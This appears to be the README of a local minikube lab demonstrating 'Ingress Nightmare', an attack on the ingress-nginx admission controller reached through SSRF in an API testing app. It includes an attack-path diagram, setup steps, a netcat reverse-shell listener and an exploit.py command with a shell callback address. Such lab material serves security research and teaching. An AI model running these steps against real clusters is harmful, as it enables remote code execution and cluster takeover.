Assume an attacker in external network, he trigger Ingress Nightmare by the server side request forgery (SSRF) vulnerability in a API testing app.
graph TB
Attacker["😈 External Attacker"]:::attackerStyle
subgraph "k8s cluster"
subgraph "ingress-nginx namespace"
ingressNginx["Ingress-NGINX Controller"]:::k8s
admission["😈 Admission Controller"]:::k8s
end
subgraph "default namespace"
pocService["API Testing App"]:::k8s
ssrf["⚠️ SSRF Vulnerability"]:::vuln
end
end
Attacker -->|"1.sends requests"| ingressNginx
ingressNginx -->|"2.routes traffic"| pocService
admission -->|"validates config"| ingressNginx
pocService -- "3.sends malicious requests (SSRF)" --> admission
classDef k8s fill:#326ce5,stroke:#fff,stroke-width:2px,color:#fff;
classDef k8s-pwn fill:#eea29a,stroke:#fff,stroke-width:2px,color:#fff;
classDef attackerStyle fill:#eea29a,stroke:#000,stroke-width:2px,color:#fff;
classDef vuln fill:#fff3cd,stroke:#ff9800,stroke-width:2px,color:#d35400;
class ingressNginx,pocApp,pocService,pocPod k8s;
class admission k8s-pwn;
class Attacker attackerStyle;
class ssrf vuln;
This environment requires below components install in your machine
- Docker
- kubectl
- minikube
cd poc-env
./setup.sh
p.s.: This will add ingress-nginx-controller dns to /etc/hosts on your host
- Start your reverse shell listener
nc -lvnp 4444
- Run exploit script in another terminal
python3 exploit.py http://ingress-nginx-controller.ingress-nginx.svc.cluster.local https://ingress-nginx-controller-admission.ingress-nginx.svc.cluster.local:443 192.168.49.1:4444 reviews/match-cn.json
p.s. 192.168.49.1 may be different